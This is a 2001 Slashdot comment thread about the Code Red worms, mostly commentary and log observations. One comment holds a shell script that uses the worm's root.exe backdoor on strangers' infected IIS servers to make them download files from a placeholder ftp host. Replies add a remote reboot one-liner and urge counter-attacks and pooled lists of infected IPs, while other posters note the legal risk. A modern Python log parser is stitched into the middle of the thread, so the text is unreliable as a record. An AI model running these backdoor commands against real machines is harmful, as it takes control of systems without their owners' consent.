    There is a way (I have it written down at home) to do this. I stumbled across it when looking for a way to come up with a shortcut icon to double-click to shut down my machine (rather than the standard Start, Shutdown method). It involves using rundll32 with a specific command and some options (offhand, I can't remember what they are). And it works quite nicely too (tried it myself)... it pretty much just kills everything and shuts down (you don't get those annoying "waiting for task to end" boxes).

    Magius_AR

  87. Code Red Infects Slashdot! by Mdog · · Score: 5, Funny

    It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!

    1. Re:Code Red Infects Slashdot! by Kwelstr · · Score: 1

      Microsoft is a bad neighbor, who's allowed their yard to fill with filth and trash, subjecting the people around them to the vermin and roaches that breed within their unkempt property. It is on this day that the internet will begin to sputter and fail in places due to the tremendous burden Microsoft's incompetence has placed upon it.
      Microsoft's products spew pollution into the information space like a burning mountain of tires.


      Yeah and the funny thing is, they may be doing it on purpose, seriously. Just check out the last Cringely article at PBS on this subject.
      http://www.pbs.org/cringely/pulpit/pulpit20010802.html

      --


      ~~~Please pass the salt, I hate unsalted MD5s :-/
    2. Re:Code Red Infects Slashdot! by cyberdonny · · Score: 2
      > It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.

      I hate to defend Micro$oft, but at least in this instance, they are only a nuisance to themselves (and to their customers). Indeed, Code Red only infects IIS, not Apache nor any of the many other brands of Webservers. And please don't bring out that old canard of CodeRed eating bandwidth and bringing the Internet to a crawl: this one has been debunked here: the real reason for the July 10th slowdown was... a train wreck!

    3. Re:Code Red Infects Slashdot! by thrig · · Score: 1

      Code Red has a nasty side effect of knocking over (the poorly written) embedded webservers in hardware devices, such as the HP 4000 or the Cisco 67* DSL router, so it's not just Microsoft products. See the "two birds with one stone" thread, recently featured on BugTraq.

      I feel Microsoft products have been a public nuisance since they introduced the deplorable notion of active content in a document (word macro virus)-- forcing me to waste time installing anti-virus software to deal with the symptoms.

    4. Re:Code Red Infects Slashdot! by CodeRed · · Score: 1, Funny

      I have been here a while my friend.

      I think for my next amazing trick, I'll send a bit of news about Code Red from CodeRed.

      --

      --
      CodeRed, the lower user #. No relation to SirCam.
    5. Re:Code Red Infects Slashdot! by IronChef · · Score: 2


      Here are some of the sites that have tried to infect me. These servers all had live content when I last checked. Very humorous.

      http://65.3.197.16/

      http://65.3.145.164/ ('welcome to the all porshe page!' Hilarious, GeoCities quality web site.)

      Most of the rest of the machines that hit me had IIS "under construction" signs up.

    6. Re:Code Red Infects Slashdot! by Umanity · · Score: 2, Informative

      Notice that this article was written before the appearance of CR2, the more virulent version of Code Red. I too believed that the worm was "Overhyped" in the media. But as of yesterday, I saw a four-fold increase in the attacks from the worm. I think the new version could be quite a problem. I have been tracking down systems infecting others and calling the sysadmin. I think we need to pro-actively stop this thing by alerting sysadmins that their machines are compromised.

      I have noticed that a lot of the recent hits have been coming from my Service Provider's address space. And the frequency of attacks is increasing. On the 2nd of August I only got about 30 hits, about 1 every hour. On the 4th of August I got over 80 hits, that's about 4 hits an hour.

      This thing is gaining momentum... Don't be foolish and underestimate it...

      --

      Michael A. Uman
      Sr Software Engineer
      softwaremagic.net

    7. Re:Code Red Infects Slashdot! by AstroJetson · · Score: 1

      I'm not exactly sure what to look for, but I'm noticing a lot of entries in my system log like this:
      Packet log: input DENY ppp0 PROTO=6 65.14.239.180:3281 [my IP]:80 L=48 S=0x00 I=29746 F=0x4000 T=118 SYN

      That IP translates to cj40900-a.alex1.va.home.com. If I try to access it w/ a web browser I get:
      The page cannot be displayed
      There are too many people accessing the Web site at this time...clearly a MS error message due to the link to Microsoft Support at the bottom of the page.

      nmap identifies the OS as Windows 2000 Pro RC1/W2K Advance Server Beta3

      Is this CR? I'm guessing that it is.

      --
      Admit nothing, deny everything and make counter-accusations.
    8. Re:Code Red Infects Slashdot! by MadAhab · · Score: 2
      While it's sorta alarmist, it *could* be true. But Cringely provides his own Occam's razor right in the same article; Microsoft allows poor security because improving it would not increase their market share. No one chooses a Microsoft product on security criteria, and the few people who choose against it are the folks who have

      The resistance to even installing support at the ISP level for a Microsoft networking protocol would be much larger than he accounts for. For one thing, I've seen ISPs belly flop on flash upgrades before. Now figure that such a protocol would have to be in place at every hop along the way. Even if it were encapsulated in TCP/IP, this would bring performance down and require at least the other end to use the protocol, and that's a pretty thin wedge.

      Their chances of succeeding in such a takeover would be exceedingly poor, at least without legislative action, and Microsoft would come out a real loser in that kind of political battle in DC. The number of "all business is all right, all the time" nitwits in Washington can be easily calculated by counting bow ties, while Microsoft's enemies are many and not so easy to identify.

      Cringely's actually a pretty smart guy, but he's wrong on this one.

      --
      Expanding a vast wasteland since 1996.
    9. Re:Code Red Infects Slashdot! by No-op · · Score: 1

      I'm on the RoadRunner network, and my little freebsd desktop has received 644 hits since august 1. 566 of those TODAY, on august 4th, almost completely consisting of the coderedII version.

      of course this makes me regret linking /default.ida to a 500mb random text file :)

      --
      EOM
    10. Re:Code Red Infects Slashdot! by Anne_Nonymous · · Score: 1

      Thank you. Also of interest to those with POS Cisco 675's is the following link on correcting the problem:

      http://support.visi.com/dsl/codered.html

  88. Finger of God by LinuxHam · · Score: 2, Funny

    Time for the long-awaited "Finger of God" script. Fdisk 'em!

    --
    Intelligent Life on Earth
  89. Eh... by geggibus · · Score: 1

    When will somebody modify the worm, so it downloads and installs the patch.. then searches for other vulnerable victims and infects them... ;)

    /Geggibus "Ehh..."

  90. File download script by nebby · · Score: 5, Interesting

    (Copied from the other thread, for those who are working on a way to fix this worm)

    I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


    #!/bin/sh
    # Code Red ][ Download File script
    # Usage: dlfile.sh infectedIP filename
    #
    # Please set the $ftp and $dir values to
    # the ftp and directory of the patch and shutdown repository

    # For ftp.youhavesetup.com
    FTP="ftp%2eyouhavesetup%2ecom"
    # Directory /pub/cr
    DIR="%2fpub%2fcr"

    echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3etmpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfile+$FTP+%3edlfile%2ecmd | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


    I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

    --
    --
    1. Re:File download script by Molina+the+Bofh · · Score: 2

      > I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.

      The idea is nice, the intention is laudable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

      The argument that you're doing this for their own good is the same one that crackers use.
      -"Oh, we're doing them a favour, showing their vulnerabilities."

      --

      -
      Roses are #FF0000, Violets are #0000FF, find / -name '*base*' |xargs chown -R us && mv zig greatjustice
    2. Re:File download script by nebby · · Score: 3, Interesting

      Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.

      The intention isn't the same as crackers though; writing a script to patch and restart IIS is not an in-your-face "showing their vulnerabilities" crack, it's basically a free-of-charge Windows update compliments of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It's a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.

      If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)

      --
      --
    3. Re:File download script by elefantstn · · Score: 2
      The idea is nice, the intention is laudable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

      Are you sure? I mean, it's not like you're cracking into people's boxes randomly to do this; only computers that try to attack your Apache server are affected. Of course, thieves have successfully sued for unsafe property after injuring themselves during attempted burglaries, so who knows...

      --
      If it ain't broke, you need more software.
    4. Re:File download script by Erasmus+Darwin · · Score: 2
      I believe it would be considered illegal in most countries.

      What if one were to change one's web server's main page to advertise an automated Code Red fixing service, conveniently located at http://www.example.com/default.ida?

      I suppose it probably wouldn't hold up in court, but it'd still be amusing.

    5. Re:File download script by M.+Silver · · Score: 2
      The idea is nice, the intention is laudable, but I believe it would be considered illegal in most countries. After all, you are actually using their machine without permission.

      If it was initiated by their machine (that is, by the default.ida request), that might be questionable, though. Not that *I'd* want to test it out in court, but I wouldn't dismiss it out of hand.

      --

      Slashdot's token middle-aged housewife
    6. Re:File download script by Xemu · · Score: 2, Informative
      Also, I was unable to figure out a way to get the machines to reboot or restart IIS


      Rebooting a compromised IIS server is trivial, just add this to your script

      (echo "GET /scripts/root.exe?/c+iisreset+/reboot HTTP/1.0\n\n\n\n" ; sleep 5) | telnet $1 80

      or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system.

      --
      Tell your friends about xenu.net
    7. Re:File download script by Mike+Schiraldi · · Score: 2

      or you could substitute iisreset/reboot with one iisreset/stop and one iisreset/start for less impact on the system

      Um, if you stop the IIS server, how exactly are you going to send it a start command?

    8. Re:File download script by asackett · · Score: 1

      Hmmm... If you connect to my box and request a file named foo.bar, and my box sends you a file named foo.bar, but it's not got the content that you expected, am I using your computer without your consent?

      --

      Warning: This signature may offend some viewers.

    9. Re:File download script by camusflage · · Score: 2

      Uhhhh, Yeah. Tell it to Max Butler (aka Max Vision). He did the same thing for the bind worm, releasing a worm that fixed the hole. He's now doing 18 months with three years of probation, plus $60k in restitution.

      Read here if you're still thinking of releasing this creature into the wild.

      --
      The truth about Scientology, Xenu, and you: Operation Clambake
    10. Re:File download script by Javit · · Score: 1

      Tell it to Max Butler (aka Max Vision). He did the same thing for the bind worm, releasing a worm that fixed the hole.

      Butler's worm also left a backdoor on all the systems it "fixed." Hardly synonymous with nebby's intent. However, I do think releasing another worm to counter Code Red is a bad idea. It's likely that doing so would result in as much ill will as good for the author of the patching worm.

      See this Wired article for more info about Butler's case.

      -Javit

      --
      Support NRA, America's oldest civil rights group.
    11. Re:File download script by cyberwench · · Score: 1

      I don't know... that might be the key to the whole thing. After all, their server requested the file. =)

      --
      ~ Leilah
    12. Re:File download script by Caspuh · · Score: 1

      Ummm, MS released a fix for this over a month ago.

    13. Re:File download script by camusflage · · Score: 2

      I suppose it probably wouldn't hold up in court, but it'd still be amusing.

      Doesn't even hold up technologically, let alone in court.

      In theory, it sounds good. You're ignoring that the infection comes from a malformed request, not response. To make it work, you'd need to take the IP issuing the request, and fire a request back at it containing your payload.

      "Ummm, I was just seeing who was talking to me. I didn't know they were vulnerable!"

      --
      The truth about Scientology, Xenu, and you: Operation Clambake
    14. Re:File download script by spectral · · Score: 1, Funny

      forget another worm, just make a counter-attack, not a counter-worm. you're scanned. In retaliation, fix it. Self-defense argument anyone?

    15. Re:File download script by Erasmus+Darwin · · Score: 2
      You're ignoring that the infection comes from a malformed request, not response.

      Well, the argument is that the counter-attacker would be advertising a service which the Code Red worm then "requests".

      An analogy might be to the telephone service providers that registered names like "I don't care", thereby inadvertently foisting their services upon someone who said that phrase for different reasons.

      Similarly, the counter-attacker would be treating a request to "/default.ida" as the means by which a machine indicates that it desires to have the Code Red worm backdoor exploited on itself.

      Overall, it's predicated on the notion of what indicates acceptance of conditions on the web. Is someone providing a controversial service responsible for determining, beyond a shadow of a doubt, that the person requesting a service really knows what they're doing? Or is it the fault of the entity generating the request (in this case, the Code Red worm itself)? I suspect the answer's somewhere in the middle, but I have no clue on exactly where it would lie.

    16. Re:File download script by Dr.+A.+van+Code · · Score: 1
      One thing you're missing, though, is that the people who are still infected by this thing are people who aren't paying any attention to what is going on. Not watching the news and/or don't even know that they're running IIS.

      Therefore, you couldn't get in trouble for fixing their machines without their permission because they'd never even realize you had done so!

      Cheers!

      --
      Good mfences make good neighbors.
  91. Is this just the beginning? by StarTux · · Score: 1

    What worries me is if this is just the beginning in a wave of attacks.

    As everyone notices is that it is being directed against the following:

    Microsoft users using e-mail.
    Microsoft servers on the Internet.

    Sircam is annoying to say the least, as it attacks the lack of security on the Windows platform and the lack of knowledge of plenty of Windows users.

    Code Red mk1 and mk2 attack the lack of security on IIS (patch is available, MS patches known to cause other issues, we hear it) and then spread like wildfire.

    StarTux
    PS Microsoft is not very professional in its conduct IMHO. It's not all about money and power, it's about providing the best possible software/service for your customers...

  92. Re:Anyone still consider this a Microsoft problem? by forgeeks · · Score: 1

    sounds great, but the problem is you would get in so much trouble for that.

    --
    -- Powered By Linux
  93. Not a bug by Mike+Schiraldi · · Score: 5, Funny

    I've always wanted to be able to telnet into my Windows box. Where can i get this virus?

    1. Re:Not a bug by Delrin · · Score: 1

      The only command that will work though is winipcfg or ipconfig for those NT ppl. ;-)

    2. Re:Not a bug by Mike+Schiraldi · · Score: 1, Offtopic

      Just put your box on the net and wait.

      Oh, Windows Update is using Push technology now?

    3. Re:Not a bug by imipak · · Score: 2
      of course, you know you can run your standard sshd, as well as VNC (hey, why not tunnel the former out via the latter?)

      The temptation to dig some IPs from the logs and go for a wee look around at open machines is pretty intense (not that I'll be giving in, I hasten to add - bad ethics innit?) ... and it's at times like this I wish I'd gone to the effort of finding a commandline MTA for NT, though; it's a real pain manually looking up the POC & mailing them...

    4. Re:Not a bug by Umanity · · Score: 1

      Duh!

      I just downloaded a very good ssh implementation for Windows2000. Now I can ssh to a shell on the W2000 box and build my projects without having to spin-around and use that Useless GUI included with Windows2000.

      Good luck,

      --

      Michael A. Uman
      Sr Software Engineer
      softwaremagic.net

    5. Re:Not a bug by ScumBiker · · Score: 1

      Which SSH implementation did you go for? I wouldn't mind trying it myself, since the damn State^H^H^H^H^H^H^H^H my employer has standardized on M$ shit. Oh well, it pays the bills.

      BTW, I'm up to 130 CR2 hits on my name/HTTP server too. Just to stay on topic, donchaknow.

      --
      --- Think of it as evolution in action ---
    6. Re:Not a bug by ergo98 · · Score: 1

      How does sit "barely qualify"? NT 4 had a telnet server in the resource kit, and in the UNIX pack, as well as a good selection of third-party telnet servers.

      Personally I use netmeeting desktop sharing though: Works beautifully, and it lets me use graphical administration tools as well.

  94. Yup, sircam is more annoying by PsionicMan · · Score: 1

    My employer, a reasonably computer proficient person, got hit by sircam. Cost him 16 hours of productivity during a period when time was particularly valuable...

    --

    1. Re:Yup, sircam is more annoying by Malcontent · · Score: 2

      Is he still using it? The answer to that question really determines weather or not he is a dufus.

      --

      War is necrophilia.

    2. Re:Yup, sircam is more annoying by mantis71 · · Score: 1

      How proficient could this guy possibly be if sircam cost him 16 hours? I am the MIS at a small software company and it took myself and my system admin no more than 3 hours to clean every workstation and server on the entire network. I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot.

    3. Re:Yup, sircam is more annoying by NonSequor · · Score: 2
      Is he still using it? The answer to that question really determines weather...

      That's pretty damned amazing. To think that weather can be determined by a simple yes or no question.

      --
      My only political goal is to see to it that no political party achieves its goals.
    4. Re:Yup, sircam is more annoying by konmaskisin · · Score: 1
      I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot

      Me oh my. And what fate would you reserve to the designers of programs that enable this silliness? It's sort of odd how Microsoft seems to get off the hook *completely* on this ...

  95. Re:Aural Feedback by bmoore · · Score: 1

    Change your 'grep XXXXXXXXXXXXXXX' to 'grep default.ida' That way, you can get all the different variants. The 'X's are used by Code Red II, not the initial one.
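    As an added example (not code from the thread), the grep idea above, and the earlier "grep default.ida access_log* | mail ..." suggestion, turned into a small log classifier: it reads Apache common/combined log lines, tells the original Code Red ('N' filler) from Code Red II ('X' filler) and from later root.exe/cmd.exe backdoor probes, and tallies hits per source IP and per hour. The log lines embedded here are constructed with documentation IPs, and the filler lengths and label names are assumptions.

```python
"""Classify Code Red / Code Red II hits in an Apache access log by source IP."""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache common/combined format: ip ident user [time] "method path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

# Signatures as described in the thread: the first worm pads the .ida request
# with 'N's, Code Red II with 'X's, and Code Red II leaves cmd.exe reachable as
# /scripts/root.exe, which later scanners probe. Minimum run length is assumed.
SIGNATURES = [
    ("CodeRed", re.compile(r'^/default\.ida\?N{10,}', re.I)),
    ("CodeRedII", re.compile(r'^/default\.ida\?X{10,}', re.I)),
    ("ida-other", re.compile(r'^/default\.ida', re.I)),
    ("backdoor-probe", re.compile(r'(?:root|cmd)\.exe', re.I)),
]

# Constructed sample log (documentation-range IPs, shortened filler).
SAMPLE_LOG = """\
192.0.2.10 - - [04/Aug/2001:09:00:00 -0600] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN=a HTTP/1.0" 404 285
192.0.2.10 - - [04/Aug/2001:09:30:00 -0600] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN=a HTTP/1.0" 404 285
198.51.100.7 - - [04/Aug/2001:11:00:00 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX=a HTTP/1.0" 404 285
198.51.100.8 - - [04/Aug/2001:12:15:00 -0600] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX=a HTTP/1.0" 404 285
198.51.100.9 - - [04/Aug/2001:13:00:00 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
203.0.113.9 - - [04/Aug/2001:13:00:05 -0600] "GET /index.html HTTP/1.1" 200 1043
"""


def classify(path):
    """Return a worm/probe label for a request path, or None for normal traffic."""
    for label, pattern in SIGNATURES:
        if pattern.search(path):
            return label
    return None


def parse_line(line):
    """Return (ip, timestamp, path, status) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def summarize(lines):
    """Count hits per label overall and per source IP, with first/last seen."""
    totals = Counter()
    per_ip = defaultdict(lambda: {"hits": Counter(), "first": None, "last": None})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path, _status = parsed
        label = classify(path)
        if label is None:
            continue
        totals[label] += 1
        rec = per_ip[ip]
        rec["hits"][label] += 1
        if rec["first"] is None or ts < rec["first"]:
            rec["first"] = ts
        if rec["last"] is None or ts > rec["last"]:
            rec["last"] = ts
    return {"totals": dict(totals), "per_ip": dict(per_ip)}


def hits_per_hour(summary):
    """Average worm hits per hour over the observed window (the kind of
    '30 hits, about 1 an hour' figure posters in the thread quote)."""
    recs = list(summary["per_ip"].values())
    if not recs:
        return 0.0
    first = min(r["first"] for r in recs)
    last = max(r["last"] for r in recs)
    total = sum(summary["totals"].values())
    hours = (last - first).total_seconds() / 3600
    return total / hours if hours > 0 else float(total)


def report(summary):
    """One line per attacking IP, busiest first, suitable for mailing upstream."""
    rows = []
    for ip, rec in sorted(summary["per_ip"].items(),
                          key=lambda kv: -sum(kv[1]["hits"].values())):
        labels = ",".join(f"{k}={v}" for k, v in sorted(rec["hits"].items()))
        rows.append(f"{ip} {labels} first={rec['first'].isoformat()} "
                    f"last={rec['last'].isoformat()}")
    return rows


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG.splitlines())
    print(s["totals"], f"{hits_per_hour(s):.2f} hits/hour")
    print("\n".join(report(s)))
```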

  96. Re:affects every email user? by gimpboy · · Score: 1

    SirCam spreads in an attached EXE

    so would this be an elf binary? if not i doubt it will run on my computer.

    --
    -- john
  97. Re:The Breaking Point by Malcontent · · Score: 2

    Don't hold your breath. You think a post criticizing MS will get modded up? On slashdot? Yea right! The MS posse will soon mod it down.

    --

    War is necrophilia.

  98. Origin of Code Red? by jstockdale · · Score: 1

    Just curious about the "highly caffeinated soft-drink" popular among programmers that Code Red was named after. My first guess was Coca-Cola but someone also pointed out that it could be Red Bull. I'll stay with my original guess, due to the red cans and abundance of Coke wherever I see programmers. The only question is whether it qualifies as highly caffeinated. On the other hand, Red Bull has its merit as well, being, well, "Red." However, I do debate whether or not Red Bull is highly popular, since it's expensive as hell, and a lot of the programmers I've met couldn't afford Red Bull on their non-existent salaries. Anyway ... I'd be anxious to hear what insight the slashdot community can give on this matter. *looks around table*
    damn that reminds me ... i gotta throw away some of these coke cans ;)

    --
    **AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
    1. Re:Origin of Code Red? by jstockdale · · Score: 1

      Thanks a lot guys ... never would have figured that out. In New Zealand we don't even have Mountain Dew, let alone Mountain Dew: Code Red. Just to qualify my lack of knowledge over this matter. ;) Thanks

      --
      **AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
    2. Re:Origin of Code Red? by Yorrike · · Score: 1
      Whereabouts in New Zealand do you live?! I'm venturing to say a locked shed, under a boulder, in a cave, in the South Island.

      I'm sitting here, right now, drinking a can of Mountain Dew with the following words on the label: "Bottled in the North Shore, Auckland, New Zealand".

      ...........What more can I say?

      --

      Looks can be deceiving. Or CAN they?

  99. Re:I'm sorely tempted . . . by Eric+S.+Smith · · Score: 1

    What about cable and DSL users? Unless they have static IPs (rare in my part of the world), won't they be using DHCP?

  100. Hoax by krokodil · · Score: 1

    Try this:

    http://www.slashdot.org/scritpts/cmd.exe

  101. A virus that patches systems... by TheMCP · · Score: 1
    Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that? :)
    How do you think viruses were invented?
  102. Re:this sucks by aechols · · Score: 1

    it doesn't have to be iis, and it doesn't have to be taking control of something. on the other hand, are you willing to bet that it can't be done? how many "secure" ms products (or not even ms products) have flaws like this that appear every once in a while when somebody stumbles across it? too many. code red is achieved within the legal range of values in the protocols involved. without raw sockets, it's usually just square pegs in square holes. with raw sockets, you can go into things that can't be done legally according to protocol, so now you can stuff round, triangular, and star shaped pegs through the square hole. things will break. it's like trying to run a car on water, or trying to withdraw cash from an atm with the ace of spades. the car won't start, and the atm will reject the card. yes, raw sockets are available to *nix machines, and yes it's in w2k, but these things aren't widespread among regular people and outside businesses.

    --
    Are you pondering what I'm pondering?
  103. Re:Ummm, no actuall by jgp · · Score: 1

    I don't care what anyone says, cooking an
    animal alive is just fucking sadistic.

  104. Re:Who needs Telnet by pest · · Score: 1

    well, what i'm thinking that you should actually do is something like: /scripts/root.exe?/c+move+root.exe+c:\winnt\profiles\default\you_got_code_red_you_silly_bastard.exe

  105. IIS really means... by Shingis · · Score: 1

    Insufficient Internet Security

  106. Repository of infected IP addresses by steveoc · · Score: 1

    I noticed this the other night (5th Aug Oz time), when my youngun complained about net speed. Traceroutes to west coast USA from OZ showed that traffic inside Australia was OK, but big congestion stateside (3sec hops !) Inspection of apache logs showed a new variant of the worm in action, and it has not slowed down yet. Anyway, is there a repository somewhere where we can all upload lists of (confirmed) infected IP addresses ? a quick perl script pulls them out of the apache logs. Maybe someone can knock up a service where we can post IP address lists, and have these accumulate into a monster IP list. Then make the IP list available for download. What you do with it after that is up to you. This is really good - hacking made easy, I imagine that there are a lot of newbies who can get started into real hacking because of this useful new feature introduced by Microsoft. This is probably the first (and only) thing that Bill Gates has done to dramatically improve the state of the art in Computer Science. The next generation of users should be better educated because of this. Thanks Bill !

  107. Re:Apache users Create default.ida 5mb!!!! by guuyuk · · Score: 1

    Yeah, but Microsoft would just accuse us of creating viral software to attack their site. :-)

    --
    We're sorry, the phone number you have reached is imaginary. Please rotate your phone 90 degrees and try your call again
  108. Quick! someone write an RFC by firewood · · Score: 1

    but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.


    Why not redefine the protocol to where this is the correct and proper response to a codered type connection to port 80?

  109. Re:Bad Idea by Borogove · · Score: 1

    One of the interesting side-effects of CodeRed that hasn't been discussed is this: anyone who wants to can now hack other machines with almost complete anonymity.

    I've now got a huge list of IP addresses of badly administered machines with a known IIS backdoor. It's highly unlikely that anyone would notice my attempts to hack this machine over the background noise of CodeRed traffic flying around.

    In a sense, CodeRed provides a smoke-screen for other hacking attempts, and a 'smoke-signal' to let hackers know where infected servers are.

    --
    There has been a major scientific break-in
  110. Can we sue the negligent webserver owners by iconnor · · Score: 1

    After all, if they insist on running buggy software (IIS) and don't take the time to install security patches, this is negligent.

    1. There is a duty to other internet users not to waste their resource (bandwidth);
    2. There has been a breach of this duty (either running IIS or at least not installing patches); and
    3. It has caused damage (used up my valuable bandwidth and log disk space).

    I think we should all take each IIS server owner to small claims court and extract our few dollars of damages.
    That way, it would make more economical sense to run Apache. The server owners will not have to pay for the software or the legal damages that would follow.


    Sample Letter of Complaint
    Your Name
    Address
    Date
    (Name/Address)

    Dear ________________ ,
    On (specify date), an attempt was made by your server to infect or otherwise incapacitate my server. As you are responsible for your server, you have a duty to maintain it and take reasonable steps to ensure that it does not cause damage to other computers on the internet. I assert that either by running faulty software, or in the alternative failing to keep security patches installed according to the manufacturer's guidelines, you have breached this duty of care. As a result, your servers caused my administrators to spend unnecessary effort diagnosing bandwidth and security issues and wasted bandwidth belonging to me. I hereby demand the sum of $200 for administrator's time and wasted bandwidth.

    Sincerely yours,
    Signature
    --Send certified mail, return receipt requested.

  111. Re:The Breaking Point by demaria · · Score: 1

    Most closed source software comes with the same disclaimer.

  112. Re:huge cable modem hits by iturbide · · Score: 2, Informative
    OK, You can use tcpdump and/or ethereal to check traffic over your interface. Be ready for rpm dependency resolution hell, but any decent distro should have all the necessary packages. Ethereal is the damned good GUI thing sitting on top of tcpdump, and it will tell you straightaway what is going on.

    And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.

    Enjoy

  113. Re:huge cable modem hits by rknop · · Score: 2

    Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)

    -Rob

  114. Re:The Breaking Point by Silver222 · · Score: 1
    As long as you don't author a bug that is intentionally malicious, I'm sure a jury would accept the "You get what you pay for" excuse. It would be a lot easier for Linus to defend a suit like that than it would be for Billy.

    --
    "It's not a war on drugs, it's a war on personal freedom. Keep that in mind at all times." Bill Hicks
  115. Re:The Breaking Point by Grishnakh · · Score: 1

    Open-source is a little different. It comes with a disclaimer that they're not responsible for anything that goes wrong. When you receive something for free, you can't exactly expect to hold the author liable for any problems.

    MS-ware OTOH costs a lot of money, and for that money, people should expect proper operation.

    Perhaps software creators should be all held liable, based on the cost of their software: you can sue for 100 times what you paid, for instance.

  116. Re:huge cable modem hits by markov_chain · · Score: 1
    Several hits a minute? That's a minor amount of traffic. Let's see, say 6 hits per minute, at 8 packets per TCP connection to port 80, at 125 bytes per packet. That leaves us with 1000 bytes per connection, and 6000 bytes per minute. This is 100 bytes per second, or 800 bits per second, or 0.8 Kbps. For comparison, if your cable connection is any good, you're downloading stuff at at least 1Mbps -- a thousand times faster.

    I would expect the real waste of bandwidth to come not from the infection probes, but from the virus trying to send junk to target websites, as the first Code Red tried to do to whitehouse.gov.

    ~

    --
    Tsunami -- You can't bring a good wave down!
  117. Re:Securityfocus asks for IPs by Cave+Dweller · · Score: 1

    Oh, and don't forget to tack a '| uniq' there :)

  118. Re:huge cable modem hits by stcanard · · Score: 1

    This is a me too -- my firewall logs are filling up with DENY's on port 80, ever since last night.

    Out of curiosity I've tried loading web pages from a number of the ip addresses in my logs and it seems that a lot of people on @home really hate the US government!

  119. link by clinko · · Score: 1, Redundant
  120. Re:I thought Sircam by catman · · Score: 1

    only hits Outlook users, not every email user? Are you telling me BeMail and Kmail are vulnerable? Ok, and Pegasus.
    They cannot be infected, but they have to cope with the stream of files dumped on them by Sircam - getting several 100Kbytes daily here, worst hit was 11 Mbytes ..

  121. Re:huge cable modem hits by friedmud · · Score: 1

    I too am with @Home and have been seeing large amounts of info flow into my cable modem. I am running a Masqueraded Linux box to connect my LAN to the Net - and it has been eating up all the packets - but I can't find a way to log them at all. I suspect that someone on my cable loop is probably infected with CodeRed and I am seeing all of the outgoing packets but I have no real way to tell. Does anyone know of a good way to save these packets from the bit-bucket so that we can find out who is sending them?? I really don't like the way my cable modem is flashing - it just bothers me.

  122. meanwhile... by TheQuantumShift · · Score: 1

    how much bandwidth has Windows wasted in the past few years...

    --

    Shift happens. Fire it up.
  123. Why do people still use Outlook? by alfredo · · Score: 1

    there are still alternatives out there, might as well get a copy before MS devours them too.

    We need to push for a Lemon law for software. I think it is time, folks. MS's license ensures one cannot hold them responsible for their incompetence, or, if you read I, Cringely this week, their planned mediocrity.

    --
    My Photostream
    1. Re:Why do people still use Outlook? by Osty · · Score: 1

      What the hell does Outlook have to do at all with Code Red?

      Let's assume for a second that you were talking about Taco's reference to SirCam. Now, a couple things come to mind.

      1. It's not Microsoft's fault that users actively executed an attachment -- That's the user's own damned problem.
      2. Microsoft has done quite a bit to protect users from themselves (from popping up a warning on every attachment, to actively stripping malicious attachments in Outlook XP).
      3. Microsoft has addressed this issue in service packs for earlier versions, by actively stripping attachments and/or disallowing the execution of an attachment.
      4. While Microsoft's license does disavow them from any responsibility for your ineptitude, they do still put out hot fixes and service packs.
      5. There's no excuse for the SirCam virus, because the hf's and sp's that prevent such a thing have existed for years now.
      Please take some personal responsibility when you do something stupid (like execute an attachment), just as others should take the same responsibility when they screw up. Yelling, "There should be a law!" just makes you look like a dumb liberal that needs the government to protect him from himself.
